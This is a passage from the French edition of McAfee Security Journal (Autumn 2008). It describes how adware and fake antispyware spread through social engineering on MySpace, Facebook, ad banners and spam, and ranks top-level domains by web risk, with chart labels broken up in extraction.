Les créateurs de logiciels espions et de logiciels publicitaires ont adopté de nombreuses techniques déjà populaires et ont développé leurs propres techniques afin de diffuser leurs logiciels. L'ingénierie sociale est le vecteur d'installation le plus répandu du modèle avec paiement à l'installation, qui offre un nombre plus important de possibilités de diffusion de logiciels espions et de logiciels publicitaires. Ces applications peuvent être distribuées à l'aide de mécanismes d'apparence inoffensifs, comme une offre groupée de logiciels gratuits ou à l'aide de mécanismes plus douteux, comme le spam ou les pièces jointes à des messages électroniques au contenu trompeur. Un utilisateur souhaitant installer un logiciel gratuit peut par exemple installer un logiciel publicitaire en toute connaissance de cause afin de profiter gratuitement de services supplémentaires. Même si l'installation d'un logiciel est effectuée par le biais d'un exploit ou de spam, les sociétés de sécurité peuvent ne pas le considérer comme malveillant si leur fournisseur affirme qu'il n'a joué aucun rôle dans la diffusion de son logiciel et que celui-ci est exploité par des tiers.

La confiance au centre du problème La figure 3 présente quatre scénarios d'exposition des utilisateurs à un site pratiquant l'ingénierie sociale. Ce schéma très simple peut nous permettre de comprendre les cas réels décrits ci-après. L'élément essentiel à retenir est que plus le niveau de confiance est élevé, plus les techniques d'ingénierie sociale se révèleront efficaces. Les exemples nous permettront de mieux comprendre ces mécanismes.

La plupart des contenus publicitaires étant stockés sur des serveurs et faisant appel à des technologies de type JavaScript et Flash notamment, l'insertion de publicités malveillantes à la source ne pose aucune difficulté.

Page 41: MacAfee Security Journal Fr

AUTOMNE 2008 41

Cas nº 1 : Sites web de réseau social Les sites web de réseau social représentent une véritable aubaine en termes d'ingénierie sociale, dans la mesure où les personnes qui s'y rendent cherchent soit à rester en contact avec des amis, soit à s'en faire de nouveaux. Les concepteurs de technique d'ingénierie sociale peuvent en profiter pour créer des liens et développer le facteur confiance, comme illustré dans le 1er cadre de la figure 3, puisque cette catégorie de sites web bénéficie d'un niveau de confiance très élevé.

Un certain nombre d'attaques ont fait parler d'elles en exploitant cette confiance pour installer des logiciels publicitaires sur les ordinateurs des utilisateurs :

MySpace Adult Content Viewer (Visualiseur de contenu pour adultes MySpace) (niveau de confiance : moyen). La technique utilisée dans ce cas consistait à inciter les utilisateurs à cliquer sur une fenêtre pop-up présentant des jeunes gens et portant un titre du type « I want to be loved » (Je veux qu'on m'aime)14. En cliquant sur ces publicités, les utilisateurs pouvaient télécharger le logiciel MySpace Adult Content, qui apparemment téléchargeait lui-même un logiciel publicitaire.

Vidéo YouTube frauduleuse sur MySpace (niveau de confiance : élevé). WebSense a indiqué en 2006 qu'une vidéo YouTube frauduleuse apparaissait sur plusieurs faux profils MySpace15. Tout utilisateur essayant de regarder cette vidéo se voyait proposer de procéder à l'installation de ZangoCash.

Application Facebook Secret Crush (niveau de confiance : très élevé). En janvier 2008, Fortinet a publié un avertissement relatif à un widget malveillant appelé « Secret Crush » qui tentait d'installer des logiciels publicitaires16. Cette technique d'ingénierie sociale se basait sur l'envoi d'une invitation Facebook portant le titre « 1 secret crush invitation » (Vous avez un admirateur secret). Après avoir accepté cette invitation, l'utilisateur devait installer un widget afin de connaître l'identité de cet admirateur. Il était ensuite invité à l'envoyer à cinq amis avant de découvrir enfin le nom de cette personne. Les internautes les plus crédules transféraient alors ce message à cinq autres personnes, participant du même coup à la propagation d'un véritable ver social. Une fois la procédure terminée, tout ce à quoi les utilisateurs avaient droit était un message les invitant à télécharger le logiciel publicitaire Zango. Cette technique a connu un grand succès dans la mesure où le niveau de confiance du site Facebook est très élevé.

Cas nº 2 : Bannières publicitaires Les bannières publicitaires fonctionnent sur le modèle avec paiement au clic. Les bannières bénéficiaient d'un niveau de

confiance très élevé puisque les utilisateurs visitaient des sites de confiance qu'ils consultaient régulièrement.

En 2006, The Washington Post a dévoilé la présence d'une bannière malveillante sur MySpace utilisée pour la diffusion d'un logiciel publicitaire et de chevaux de Troie auprès de millions d'utilisateurs, par l'exploitation d'une défaillance au niveau de Microsoft Windows Metafile ; cela ne nécessitait aucune intervention des utilisateurs17.

Nous assistons en 2008 à une augmentation du nombre de bannières publicitaires malveillantes. Le dernier incident significatif, au moment où nous écrivons ces lignes, concernait une publicité Flash sur le site usatoday.com18. Par une simple visite sur la page d'accueil, les utilisateurs étaient assaillis par divers logiciels malveillants et fausses alertes (technique populaire d'ingénierie sociale) les invitant à télécharger un faux outil de protection antispyware appelé Malware Alert. (Ce type de programme malveillant peut aussi bien contenir des programmes potentiellement indésirables que des chevaux de Troie.)

Cas nº 3 : Autres tactiques douteuses Usurpation d'adresses e-mail (niveau de confiance : faible).

Cette tactique a par exemple été utilisée dans le cadre de l'envoi d'e-mails à partir de fausses adresses eBay incluant un lien vers un logiciel publicitaire19. Ces messages invoquaient un problème au niveau des informations de facturation et demandaient aux utilisateurs de mettre à jour celles-ci en téléchargeant un logiciel.

Fausses pages d'erreur (niveau de confiance : moyen). Certains sites web affichaient de fausses pages d'erreur de type « Page non trouvée » et proposaient à l'utilisateur de résoudre ce problème en téléchargeant un contrôle ActiveX qui avait pour rôle d'installer WinFixer20.

Spam lié à Google Bloc-notes (niveau de confiance : élevé). Certains arnaqueurs ont récemment eut recours à une nouvelle technique d'ingénierie sociale consistant à envoyer par e-mail des liens vers des pages Google Bloc-notes21. Ces liens suivaient le format suivant : www.google.com/notebook/public/[ID-utilisateur]/[bloqué]. Le nom de domaine « google.com » met les utilisateurs en confiance et les incite à cliquer sur des liens les amenant sur des pages web malveillantes, hébergeant elles-mêmes de nombreux liens vers des sites pour adultes ou de fausses vidéos. Leur réel objectif est en fait d'amener l'utilisateur à procéder au téléchargement de faux programmes antispyware.

Utilisateur

Site web utilisant des techniquesd'ingénierie sociale (liens vers desfichiers MP3 gratuits, des vidéospour adultes, etc.)

Site de réseau social niveau de confiance élevé

Moteur de recherche niveau de confiance bas

Lien reçu par messagerie instantanée,par e-mail ou par spam niveau de confiance le plus faible

Lien reçu via le profil d'un ami sur unsite de réseau social, Google Bloc-notesou autre domaine de confiance niveau de confiance élevé

Figure 3 : De nombreux vecteurs exposent les utilisateurs aux programmes indésirables et malveillants.

Page 42: MacAfee Security Journal Fr

42 McAFEE SECURITY JOURNAL

Une retraite silencieuseL'absence de législation régulant l'utilisation de logiciels espions et logiciels publicitaires a permis aux développeurs de bénéficier d'une liberté totale, que leurs intentions soient purement vénales ou réellement malveillantes. A première vue, il semblait que les utilisateurs étaient protégés par la présence d'un contrat de licence les avertissant de possibles effets indésirables de ces applications. Ces contrats étaient toutefois incomplets et obscurs, ou n'étaient tout simplement pas affichés. Lorsqu'un utilisateur parvenait à les consulter, ces contrats étaient généralement illisibles, présentés dans des fenêtres trop petites n'affichant que quelques mots à la fois. Alors qu'ils semblaient favorisés par de tels stratagèmes, pourquoi les logiciels espions et logiciels publicitaires sont-il en perte de puissance ? Plusieurs facteurs ont contribué à ce déclin.

Poursuites judiciaires Suite à une augmentation des incidents imputés à des logiciels espions et logiciels publicitaires, de nombreux clients et autres parties ont porté plainte contre certains grands distributeurs de logiciels malveillants22, 23, 24, 25, 26, 27.

Plusieurs décisions de justice ont permis de limiter leur prolifération. Lors du procès contre Zango12 par exemple, la cour a exigé que cette société surveille ses distributeurs tiers afin de s'assurer que l'ensemble de ses partenaires se conforment aux exigences de la Federal Trade Commission (FTC) — agence fédérale américaine chargée de la protection des consommateurs et de la concurrence. Le tribunal a également interdit à Zango d'exploiter, directement ou par l'intermédiaire de tiers, des vulnérabilités de sécurité dans le but de télécharger des logiciels. De plus, il a exigé que la société indique de manière claire et précise ses conditions de divulgation et obtienne le consentement exprès de l'utilisateur avant tout téléchargement de logiciel sur son ordinateur. Ce type de décision a permis de minimiser l'impact du modèle avec paiement à l'installation et a forcé les distributeurs publicitaires à mettre de l'ordre dans leurs pratiques.

Prise de conscience du grand public et groupes sectoriels La FTC met à la disposition des utilisateurs un site web d'informations28 offrant un certain nombre de conseils sur la protection contre les logiciels espions et sur la meilleure manière de signaler des abus. L'Anti-Spyware Coalition propose également une mine d'informations sur ce type de menace29. Grâce aux efforts déployés par ces organisations, consommateurs et législateurs bénéficient désormais d'une meilleure compréhension des problèmes et des règles inhérents à la publicité en ligne. Cette prise de conscience a également permis de limiter l'apparition de ces applications indésirables.

Mauvaise publicité et procès éventuels contre des annonceurs ayant un lien avec des fournisseurs de logiciels publicitaires Les fonds ayant permis de financer le marché des logiciels espions et logiciels publicitaires proviennent à l'origine des annonceurs recourant à des fournisseurs de logiciels publicitaires pour diffuser leurs publicités. Ces sociétés marchandes et de services n'avaient pas cherché à savoir dans le détail de quelle manière les fournisseurs de logiciels publicitaires diffuseraient leurs annonces. Selon un jugement du 29 janvier 200730 qui a depuis fait jurisprudence, l'accord indiquait qu'avant de faire appel à une société assurant la diffusion de leurs publicités, puis de manière trimestrielle, toute société se doit de s'enquérir des méthodes de diffusion utilisées.

Les entreprises doivent immédiatement cesser l'utilisation de programmes publicitaires ne respectant pas les conditions de l'accord établi ou leurs propres politiques d'utilisation des logiciels publicitaires. Dans la mesure où les annonceurs ont maintenant conscience des risques associés au modèle avec paiement à l'installation (violation de la vie privée, vices du consentement, etc.), ils tendent à opter pour le modèle avec paiement au clic qui lui ne requiert l'installation d'aucun logiciel sur l'ordinateur de l'utilisateur.

Applications malveillantes Parce que les auteurs de logiciels malveillants s'enrichissent facilement en jouant sur les peurs des utilisateurs, on assiste à l'apparition d'une nouvelle tendance consistant à diffuser des applications malveillantes et de fausses alertes relatives à des chevaux de Troie, affichant des messages d'erreur et d'infections visant à tromper l'utilisateur. Dans la plupart des cas, ces fausses alertes d'infection par chevaux de Troie permettent en fait le téléchargement d'applications malveillantes détectant de faux fichiers et clés de Registre et les présentant comme des logiciels malveillants. Ces applications copient parfois certains fichiers sur le système de l'utilisateur uniquement pour pouvoir les détecter par la suite ; elles entrent dans la catégorie des chevaux de Troie (voir figure 4).

Nous avons également constaté que les chevaux de Troie servaient souvent à installer des logiciels publicitaires. Downloader-UA fait partie de la catégorie des chevaux de Troie qui font appel à des techniques d'ingénierie sociale pour télécharger de faux programmes. Découverte en 2004, cette catégorie de chevaux de Troie exploite des vulnérabilités de Microsoft Windows Media Player dans l'utilisation de la technologie DRM (Digital Rights Management) et incite les utilisateurs à télécharger des fichiers spécialement développés à des fins malveillantes31,32. En 2008, un tel cheval de Troie a été utilisé pour amener les utilisateurs à télécharger un faux logiciel de lecture de fichiers MP3 intégrant une sélection de chansons. Une fois installé, ce logiciel procédait lui-même au téléchargement nombreux logiciels publicitaires33.

Par comparaison avec les années précédentes, la croissance du nombre d'applications malveillantes (programmes potentiellement indésirables et chevaux de Troie) s'est accentuée de manière exponentielle en 2008 (voir figure 4).

1 000

500

0

2008(estimation)

200720062005

Applications malveillantes

Figure 4 : Contrairement aux logiciels espions et logiciels publicitaires, le nombre d'applications malveillantes (programmes potentiellement indésirables et chevaux de Troie) a augmenté de manière significative en 2008. (Source : McAfee Avert Labs)

Programmes potentiellement indésirables

Chevaux de Troie

Page 43: MacAfee Security Journal Fr

AUTOMNE 2008 43

Pour mesurer la fréquence des faux logiciels antispyware distribués par le biais de chevaux de Troie, nous avons analysé un ensemble d'adresses IP utilisées pour leur téléchargement. Une requête exécutée via hosts-files.net a permis de découvrir qu'une même adresse IP était associée à 158 domaines différents34 (voir figure 5).

Chacun des domaines répertoriés à la figure 5 propose soit un faux programme antispyware, soit une application malveillante de « nettoyage » du système. Ces pages existent même en plusieurs langues. Après une analyse de 620 pages, nous avons identifié 24 langues différentes à la fois pour les pages web et les applications proposées, ce qui montre bien que ces menaces ont depuis longtemps dépassé les frontières des pays de langue anglaise. Il s'est avéré qu'une même adresse IP était souvent associée à plusieurs domaines, allant parfois jusqu'à 200 domaines différents. Une recherche à partir du terme « FSA », utilisé par le site hosts-files.net pour décrire les domaines hébergeant des applications malveillantes, a renvoyé près de 3 600 résultats différents35.

Figure 5 : De nombreux noms de domaine sont associés à une même adresse IP distribuant des applications malveillantes traduites.

NOTES 1 http://www.antispywarecoalition.org/documents/2007glossary.htm 2 OptOut, Gibson Research Corp — http://www.grc.com/optout.htm 3 http://en.wikipedia.org/wiki/Compensation_methods 4 Source : Site web Zango — http://www.cdt.org/headlines/headlines.php?iid=51 5 http://www.benedelman.org/news/062907-1.html 6 http://en.wikipedia.org/wiki/Compensation_methods#Pay-per-click_.28PPC.29 7 http://www.benedelman.org/ppc-scams/ 8 http://msmvps.com/blogs/spywaresucks/archive/2007/08/22/1128996.aspx 9 http://www.theregister.co.uk/2007/09/11/yahoo_serves_12million_malware_ads/ 10 http://www.secureworks.com/research/threats/ppc-hijack/ 11 http://www.csc.com/cscworld/012007/dep/fh001.shtml 12 http://www.usgs.gov/conferences/presentations/5SocialEngineeringInternal

ExternalThreat%20Dudeck.ppt 13 http://download.microsoft.com/download/c/e/c/cecd00b7-fe5e-4328-8400-

2550c479f95d/Social_Engineering_Modeling.pdf14 http://mashable.com/2006/10/11/myspace-adult-content-viewer-more-adware/15 http://securitylabs.websense.com/content/Alerts/1300.aspx16 http://www.fortiguardcenter.com/advisory/FGA-2007-16.html17 http://blog.washingtonpost.com/securityfix/2006/07/

myspace_ad_served_adware_to_mo.html

18 http://securitylabs.websense.com/content/Alerts/3061.aspx19 http://securitylabs.websense.com/content/Alerts/738.aspx20 http://www.avertlabs.com/research/blog/index.php/2006/12/04/

404-not-just-file-not-found/21 http://www.cantoni.org/2008/06/04/google-notebook-spam22 http://www.benedelman.org/spyware/nyag-dr/23 http://www.oag.state.ny.us/media_center/2005/apr/apr28a_05.html24 http://www.internetlibrary.com/cases/lib_case358.cfm25 http://blogs.zdnet.com/Spyware/?p=65526 http://www.ftc.gov/opa/2006/11/zango.shtm27 http://www.ftc.gov/bcp/edu/microsites/spyware/law_enfor.htm28 http://onguardonline.gov/spyware.html29 http://www.antispywarecoalition.org/30 http://www.oag.state.ny.us/media_center/2007/jan/jan29b_07.html31 http://www.pcworld.com/article/119016/risk_your_pcs_health_for_a_song.html32 http://vil.nai.com/vil/content/v_130856.htm33 http://www.avertlabs.com/research/blog/index.php/2008/05/06/

fake-mp3s-running-rampant/34 http://hosts-file.net/?s=67.55.81.200&sDM=1#matches35 http://hosts-file.net/?s=Browse&f=FSA

ConclusionUne simple analyse statistique permet de se rendre compte que la croissance du nombre de logiciels espions et de logiciels publicitaires tend à s'essouffler. Les étonnantes techniques d'ingénierie sociale utilisées pour diffuser ces programmes potentiellement indésirables sont toutefois bien ancrées, distribuant toujours des applications malveillantes et des chevaux de Troie. Avec l'essor du modèle avec paiement au clic, nul ne peut douter que de nouvelles techniques d'ingénierie sociale verront bientôt le jour, incitant les utilisateurs à cliquer sur des publicités et générant toujours plus de profits pour les annonceurs. On peut également compter sur une augmentation de la diffusion de logiciels publicitaires et de chevaux de Troie sur les sites de réseau social. Bien que le nombre total de logiciels espions et logiciels publicitaires ait baissé, aucune panacée ne semble pouvoir enrayer à court terme la prolifération des programmes indésirables. Dans la mesure où les fournisseurs de logiciels publicitaires paient pour chaque installation effectuée, l'éthique voudrait qu'ils s'efforcent de garder une trace de chaque installation et empêchent toute diffusion illégitime de leurs logiciels. Mais peut-on réellement espérer qu'ils le fassent ?

Dans un monde où les menaces évoluent constamment et où les chevaux de Troie lucratifs sont en plein essor, nous devons rester vigilants et former les travailleurs et particuliers afin qu'ils prennent conscience des dangers de ces techniques d'ingénierie sociale.

Aditya Kapoor est expert en recherche auprès de McAfee Avert Labs. Il a découvert l'ingénierie inverse il y a six ans à l'université de Lafayette en Louisiane, en rédigeant son mémoire de maîtrise sur un algorithme de désassemblage visant au démasquage de code. Chez McAfee, Kapoor a développé ses compétences en analyse de rootkits, en comparaison de code et en analyse comportementale. Ses passions incluent les voyages, ainsi que la découverte de cultures et d'architectures de pays étrangers.

Page 44: MacAfee Security Journal Fr

44 McAFEE SECURITY JOURNAL

David Marcus

Quel niveau de risque pour les domaines de premier niveau ?

Dans son excellent article « Cartographie mise à jour du Web malveillant », publié dans le bulletin d'informations Perspectives McAfee sur la sécurité1 de juin 2008, notre collègue Shane Keats a analysé en profondeur la répartition des sites web malveillants sur Internet à partir de données recueillies grâce au logiciel McAfee® SiteAdvisor®. De nos jours, les internautes souhaitent pouvoir surfer et effectuer leurs recherches dans un environnement entièrement sécurisé. Mais si l'on compare Internet à une immense ville numérique, comment savoir quels sont les quartiers qu'il est plus prudent d'éviter ? Quels domaines présentent le plus de risques ? Quel domaine de premier niveau a fait le plus de progrès en matière de sécurité ? Lequel est le plus à la traîne ? Certains termes de recherche sont-ils plus risqués que d'autres ?

Les internautes se posent de plus en plus ce genre de questions. L'objectif de McAfee Security Journal est de vous apporter les réponses à ces questions à l'aide d'analyses et de données concrètes, de sorte que vous puissiez prendre les meilleures décisions possible.

Dans la présente édition, nous avons compilé des informations récentes sur les menaces liées aux domaines de premier niveau, qu'il s'agisse de domaines génériques (.com, .info ou .biz notamment) ou nationaux (dont .cn, .ru ou .br). Nous avons évalué les niveaux de risques actuels que présentent ces domaines sur le continent américain, en Europe et en Asie, mais aussi analysé leur évolution depuis l'année passée. Nous avons classé chaque domaine de premier niveau selon son profil de risque global, puis effectué une analyse complémentaire en matière de pratiques de messagerie électronique, de sécurité des téléchargements et de la prévalence des exploits web. Nous avons ensuite dégagé les vingt domaines de premier niveau qui se distinguaient pour chaque type de risque.

Les résultats se révèlent saisissants. Les données recueillies montrent clairement que les risques ne sont pas répartis uniformément sur Internet. Les domaines génériques et nationaux présentent en effet des types et des degrés très variés de risques et de dangers. Certains pays font preuve d'excellentes pratiques en matière de courrier électronique, par exemple, mais d'habitudes déplorables lorsqu'il est question des téléchargements. D'autres sont quant à eux de vrais nids à exploits et codes malicieux. Nous

espérons que ces résultats vous permettront de naviguer plus sereinement. Pensez simplement à regarder où vous mettez les pieds avant de vous promener sur Internet.

Analyse des graphiques Dans le diagramme intitulé « Domaines de premier niveau d'Europe, du Moyen-Orient et d'Afrique classés par profil de risque global », on peut voir que les domaines roumains en .ro (barre à l'extrême gauche) représentent presque 7 %. Selon le logiciel SiteAdvisor, cela signifie que McAfee a constaté que près de 7 % des sites appartenant à ce domaine de premier niveau ont présenté une ou plusieurs menaces, comme des exploits de navigateur, des logiciels publicitaires, des logiciels espions, des chevaux de Troie ou des virus, du spam, des affiliations à d'autres sites dangereux, des fenêtres pop-up agressives, ou ont fait l'objet de commentaires de part de la communauté SiteAdvisor. Plus cette valeur est élevée, plus le risque s'avère important pour les utilisateurs. Pour mettre ces valeurs en perspective, nous proposons sur le même graphique une courbe indiquant leur évolution par rapport à l'année passée. Cette courbe montre qu'en Roumanie le risque a augmenté d'environ 1 %, alors qu'il a par exemple baissé de près de 3 % en Slovaquie. Les valeurs positives témoignent d'une augmentation des risques par rapport à l'année précédente et les valeurs négatives indiquent une diminution des risques.

David Marcus est responsable de la recherche en sécurité et de la communication chez McAfee Avert Labs. Il contribue à faire connaître la recherche de pointe que mène Avert Labs auprès des clients McAfee et de la communauté des experts en sécurité. Marcus est actuellement responsable des relations publiques et des médias, consultant technologique, rédacteur en chef du blog McAfee Avert Labs Security Blog, mais aussi co-présentateur d'AudioParasitics, le podcast officiel de McAfee Avert Labs. Outres ces nombreuses responsabilités, il gère également l'ensemble des publications d'Avert Labs, dont ce McAfee Security Journal

Les données McAfee SiteAdvisor permettent d'étudier l'évolution des risques dans le monde.

NOTES 1 http://www.mcafee.com/us/security_insights/archived/june_2008/si_jun1_08.html

Page 45: MacAfee Security Journal Fr

AUTOMNE 2008 45

Volume importantd'e-mails commerciaux

Fenêtres pop-upagressives

Logiciels publicitaires,chevaux de Troie,

logiciels espions, virus

Affiliation avecd'autres sites

dangereux

Commentaires et avis publiéspar la communauté SiteAdvisor

Exploits de navigateurs

6 %Ro

uman

ie .r

o

4 %

2 %

0 %

8 %

-2 %

-4 %

Domaines de premier niveau d'Europe, du Moyen-Orient et d'Afrique classés par profil de risque global

Russ

ie .r

u

Ukra

ine

.ua

Unio

n eu

ropé

enne

.eu

Iran

.ir

Espa

gne

.es

Bulg

arie

.bg

Italie

.it

Fran

ce .f

r

Letto

nie

.lv

Polo

gne

.pl

Hong

rie .h

u

Répu

bliq

ue tc

hèqu

e .c

z

Suiss

e .c

h

Belg

ique

.be

Turq

uie

.tr

Slov

aqui

e .sk

Israë

l .il

Alle

mag

ne .d

e

Litu

anie

.lt

Esto

nie

.ee

Autri

che

.at

Portu

gal .

pt

Pays

-Bas

.nl

Croa

tie .h

r

Afriq

ue d

u Su

d .z

a

Roya

ume-

Uni .

uk

Youg

osla

vie

.yu

Grèc

e .g

r

Suèd

e .se

Irlan

de .i

e

Dane

mar

k .d

k

Islan

de .i

s

Slov

énie

.si

Norv

ège

.no

Finla

nde

.fi

Evolution du risqueentre 2007 et 2008(par point)

Risque globalen 2008

0 %

Hong

-Kon

g .h

k

-2 %

-4 %

-6 %

6 %

4 %

2 %

-8 %

-10 %

Domaines de premier niveau d'Asie classés par profil de risque global

Répu

bliq

ue p

opul

aire

de

Chin

e .cn

Phili

ppin

es .p

h

Iles C

ocos

(Kee

ling)

.cc

Îles S

amoa

.ws

Inde

.in

Coré

e du

Sud

.kr

Tuva

lu .t

v

Tong

a .to

Viêt

Nam

.vn

Ile C

hrist

mas

.cx

Taïw

an (R

épub

lique

de

Chin

e) .t

w

Toké

laou

.tk

Niou

é .n

u

Thaï

land

e .th

Vanu

atu

.vu

Indo

nésie

.id

Mal

aisie

.my

Nouv

elle

-Zél

ande

.nz

Sing

apou

r .sg

Aust

ralie

.au

Japo

n .jp

14 %

12 %

10 %

8 %

20 %

18 %

16 %

Evolution du risqueentre 2007 et 2008(par point)

Risque global en 2008

1 %

Etat

s-Un

is .u

s

0,5 %

0 %

-0,5 %

2,5 %

2 %

1,5 %

-1 %

-1,5 %

Arge

ntin

e .a

r

Brés

il .b

r

Mex

ique

.mx

Chili

.cl

Cana

da .c

a

Vene

zuel

a .v

e

Colo

mbi

e .c

o

Domaines de premier niveau du continent américainclassés par profil de risque global

Evolution du risqueentre 2007 et 2008(par point)

Risque global en 2008

Critères de risque utilisés pour l'évaluation des domaines de premier niveau

Page 46: MacAfee Security Journal Fr

46 McAFEE SECURITY JOURNAL

20 %

15 %

10 %

5 %

25 %

0 %

-5 %

Classement des 20 domaines de premier niveau présentant le plus grand risque en termes de téléchargements

Info

rmat

ions

.inf

o

Roum

anie

.ro

Iles S

amoa

.ws

Entre

prise

s .bi

z

Répu

bliq

ue p

opul

aire

de

Chin

e .c

n

Italie

.it

Indi

vidu

s .na

me

Bulg

arie

.bg

Belg

ique

.be

Iles C

ocos

(Kee

ling)

.cc

Tong

a .to

Tuva

lu .t

v

Rése

au .n

et

Com

mer

cial .

com

Etat

s-Un

is .u

s

Toké

laou

.tk

Ile C

hrist

mas

.cx

Letto

nie

.lv

Israë

l .il

Viêt

Nam

.vn

Evolution du risqueentre 2007 et 2008(par point)

Risque globalen 2008

30 %

20 %

10 %

0 %

60 %

50 %

40 %

-10 %

-20 %

Classement des domaines de premier niveau par pratiques en matière d'e-mail

70 %

Info

rmat

ions

.inf

o

Répu

bliq

ue p

opul

aire

de

Chin

e .c

n

Hong

-Kon

g .h

k

Rése

au .n

et

Russ

ie .r

u

Coré

e du

Sud

.kr

Entre

prise

s .bi

z

Taïw

an (R

épub

lique

de

Chin

e) .t

w

Com

mer

cial .

com

Iles S

amoa

.ws

Youg

osla

vie

.yu

Ukra

ine

.ua

Thaï

land

e .th

Iles C

ocos

(Kee

ling)

.cc

Slov

aqui

e .sk

Croa

tie .h

r

Unio

n eu

ropé

enne

.eu

Bulg

arie

.bg

Inde

.in

Letto

nie

.lv

Evolution du risqueentre 2007 et 2008(par point)

Risque globalen 2008

0,6 %

0,4 %

0,2 %

0 %

1,2 %

1 %

0,8 %

-0,2 %

-0,4 %

Evolution du risqueentre 2007 et 2008(par point)

Risque globalen 2008

Roum

anie

.ro

Info

rmat

ions

.inf

o

Hong

-Kon

g .h

k

Niou

é .n

u

Répu

bliq

ue p

opul

aire

de

Chin

e .c

n

Russ

ie .r

u

Entre

prise

s .bi

z

Indi

vidu

s .na

me

Iles C

ocos

(Kee

ling)

.cc

Croa

tie .h

r

Tong

a .to

Ukra

ine

.ua

Viêt

Nam

.vn

Inde

.in

Rése

au .n

et

Portu

gal .

pt

Iles S

amoa

.ws

Polo

gne

.pl

Etat

s-Un

is .u

s

Com

mer

cial .

com

Classement des 20 domaines de premier niveau présentant le plus grand nombre d'exploits

Page 47: MacAfee Security Journal Fr

AUTOMNE 2008 47

Page 48: MacAfee Security Journal Fr

48 McAFEE SECURITY JOURNAL

McAfee, Inc. Tour Franklin La Défense 8 92042 Paris La Défense Cedex France

+33.1.47.62.56.00 (standard)

www.mcafee.com/fr

McAfee et/ou les autres marques citées dans ce document sont des marques commerciales ou des marques commerciales déposées de McAfee, Inc. et/ou de ses sociétés affiliées aux Etats-Unis et/ou dans d'autres pays. La couleur rouge McAfee utilisée pour identifier des fonctionnalités liées à la sécurité est propre aux produits de la marque McAfee. Toutes les autres marques commerciales déposées ou non déposées citées dans ce document sont la propriété exclusive de leurs détenteurs respectifs. © 2008 McAfee, Inc. Tous droits réservés.

5001_sec-jrnl_fall08